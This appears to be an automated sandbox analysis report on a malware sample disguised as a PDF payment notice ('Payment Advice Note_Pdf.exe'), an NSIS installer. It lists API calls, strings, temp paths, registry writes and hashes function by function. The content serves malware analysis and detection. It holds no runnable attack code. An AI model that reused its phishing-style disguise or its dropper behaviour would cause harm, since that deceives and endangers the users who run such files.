\*.*, xrefs: 0040587B
C:\Users\user\AppData\Local\Temp\, xrefs: 0040581D

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3467940989
Opcode ID: 487927d821d8a0898e73912e2e2b05b1cad8163ff0d32b65c607c8f86209bea5
Instruction ID: d8405d9d0b65c0b5bb91e26b2d86fa163654aae1973f92c1c3fedea70a861e09
Opcode Fuzzy Hash: 487927d821d8a0898e73912e2e2b05b1cad8163ff0d32b65c607c8f86209bea5
Instruction Fuzzy Hash: EA41F271800A18FACB21BB658C49BBF7A78EB81365F10817BF805711D1C77C4D919EAE

Function 004066E3 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
Instruction ID: 25739d06ab219284b51534763859987154442e2999ed31f69dfe775b8bf1d6bb
Opcode Fuzzy Hash: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
Instruction Fuzzy Hash: 09F17671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 00406362 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425758,00424F10,00405B24,00424F10,00424F10,00000000,00424F10,00424F10, 4<v,?,C:\Users\user\AppData\Local\Temp\,00405830,?,763C3420,C:\Users\user\AppData\Local\Temp\), ref: 0040636D
FindClose.KERNEL32(00000000), ref: 00406379

Strings

XWB, xrefs: 00406363

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XWB
API String ID: 2295610775-4039527733
Opcode ID: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
Instruction ID: b60ab41fd2821b41d0b392bba1ac2053f61c2dcbfada57179e30504603363e2d
Opcode Fuzzy Hash: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
Instruction Fuzzy Hash: BBD0123194C1209FD3401778BD0C88B7B989B553317214B72FD2AF23E0C3388C6586D9

Function 00403C0B Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C47
ShowWindow.USER32(?), ref: 00403C64
DestroyWindow.USER32 ref: 00403C78
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C94
GetDlgItem.USER32(?,?), ref: 00403CB5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC9
IsWindowEnabled.USER32(00000000), ref: 00403CD0
GetDlgItem.USER32(?,00000001), ref: 00403D7E
GetDlgItem.USER32(?,00000002), ref: 00403D88
SetClassLongW.USER32(?,000000F2,?), ref: 00403DA2
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DF3
GetDlgItem.USER32(?,00000003), ref: 00403E99
ShowWindow.USER32(00000000,?), ref: 00403EBA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECC
EnableWindow.USER32(?,?), ref: 00403EE7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFD
EnableMenuItem.USER32(00000000), ref: 00403F04
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F1C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2F
lstrlenW.KERNEL32(00422708,?,00422708,00428220), ref: 00403F58
SetWindowTextW.USER32(?,00422708), ref: 00403F6C
ShowWindow.USER32(?,0000000A), ref: 004040A0

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
Instruction ID: 61cac7681639d4f9e887145b94be1570fe16d39d0a036e069046cfcd2a92ab20
Opcode Fuzzy Hash: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
Instruction Fuzzy Hash: 3BC1C071A04200BBDB316F61ED84E2B3AACEB95705F50053EF601B11F1CB799992DB6E

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,00000400,?,?,00000000,00403504,?), ref: 00402E1B

Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00402E67

Strings

"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe", xrefs: 00402DF4
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Null, xrefs: 00402EE5
Inst, xrefs: 00402ED3
Error launching installer, xrefs: 00402E3E
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
C:\Users\user\Desktop\Payment Advice Note_Pdf.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
soft, xrefs: 00402EDC

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment Advice Note_Pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3968301388
Opcode ID: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
Instruction ID: cad0cac5a7d3da6b721da94722abfb33afad8597fd9771d3107dd1117b6c1d4f
Opcode Fuzzy Hash: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
Instruction Fuzzy Hash: EA51D471901216ABDB209F64DE89B9E7BB8EB04354F20407BF904F62D1C7BC9D419BAD

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\toenailed\quoteworthy\Atoning,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\toenailed\quoteworthy\Atoning,?,?,00000031), ref: 004017CD

Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C

Part of subcall function 0040517E: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
Part of subcall function 0040517E: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00403160,00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000), ref: 004051D9
Part of subcall function 0040517E: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll), ref: 004051EB
Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239

Strings

Call, xrefs: 00401785, 0040178E, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\toenailed\quoteworthy\Atoning, xrefs: 00401796
C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll, xrefs: 0040182D, 00401849
C:\Users\user\AppData\Local\Temp\nseEFF9.tmp, xrefs: 00401819, 00401837

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp$C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll$C:\Users\user\toenailed\quoteworthy\Atoning$Call
API String ID: 1941528284-1090578968
Opcode ID: 7f1aa3599449e1a1334286988c3271f1e7464e5e0eb0c17e959477f4938ed9ed
Instruction ID: e39dfb19bb2720adffc224853af95c022162de9bd11196ce21bc9617d3384428
Opcode Fuzzy Hash: 7f1aa3599449e1a1334286988c3271f1e7464e5e0eb0c17e959477f4938ed9ed
Instruction Fuzzy Hash: 9041D571900515BACF20BFB5CC45DAF3679EF45328B20427BF422B50E2DB3C8A519A6D

Function 0040517E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00403160,00403160,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,00000000,0040FEC0,00000000), ref: 004051D9
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll), ref: 004051EB
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll, xrefs: 0040519F, 004051AF, 004051B5, 004051D8, 004051E4

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll
API String ID: 2531174081-590684297
Opcode ID: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
Instruction ID: 21bddbe199db3e121897d5596c22f00b0e76f5ccd37bc28327e30b1938552548
Opcode Fuzzy Hash: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
Instruction Fuzzy Hash: 9E219D71900118BACB219FA5DD84ACFBFB9EF58350F14807AF904B62A0C7798A41CF68

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405CD5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CEB

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
Instruction ID: 56da5788d6d90062f79809d4a3c22d6e203981add65e083e01e3e907f30c056e
Opcode Fuzzy Hash: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
Instruction Fuzzy Hash: 3F512774D0021AAADF209F94CA88AAEB779FF04344F50447BE501F72E0D7B99D429B69

Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403088
GetTickCount.KERNEL32 ref: 00403109
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403136
wsprintfW.USER32 ref: 00403149

Strings

... %d%%, xrefs: 00403143

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 36a9e15656567d1c7056223a2e82bb3672c7df1b59e810d0cec3e4d4ddf9865c
Instruction ID: dc339ecebd5a12fc0f5e273b782e0acc65c92b35cb5ec2ffb99f959b3dc2fe49
Opcode Fuzzy Hash: 36a9e15656567d1c7056223a2e82bb3672c7df1b59e810d0cec3e4d4ddf9865c
Instruction Fuzzy Hash: CC517A71900219ABDB10DF65D904B9F3FA8AF04766F14427BF911BB2C5C7789E408BE9

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseEFF9.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

C:\Users\user\AppData\Local\Temp\nseEFF9.tmp, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp
API String ID: 1356686001-1604472696
Opcode ID: a5b94808118f4f17083c268eecdd3f8ec9f5fd7bdad50e3ddf4da40a62736a9e
Instruction ID: 7111b63e716528206d7143fef0c5d48aa4ff5df43585b472b347a68cc626e816
Opcode Fuzzy Hash: a5b94808118f4f17083c268eecdd3f8ec9f5fd7bdad50e3ddf4da40a62736a9e
Instruction Fuzzy Hash: 5B11AE71E00108BFEB10EFA4DD89DAE76BCEB04358F10403AF904B21D1D6B85E419628

Function 0040564D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
GetLastError.KERNEL32 ref: 004056A4
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B9
GetLastError.KERNEL32 ref: 004056C3

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405673

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
Instruction ID: d2f3f002a39499475f228c0a6bab6309b881bedc09a5d6a8f103fb05119b383a
Opcode Fuzzy Hash: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
Instruction Fuzzy Hash: DE010871D14219EAEF119FA0CD047EFBFB8EB14314F10853AD909B6190E779A604CFAA

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

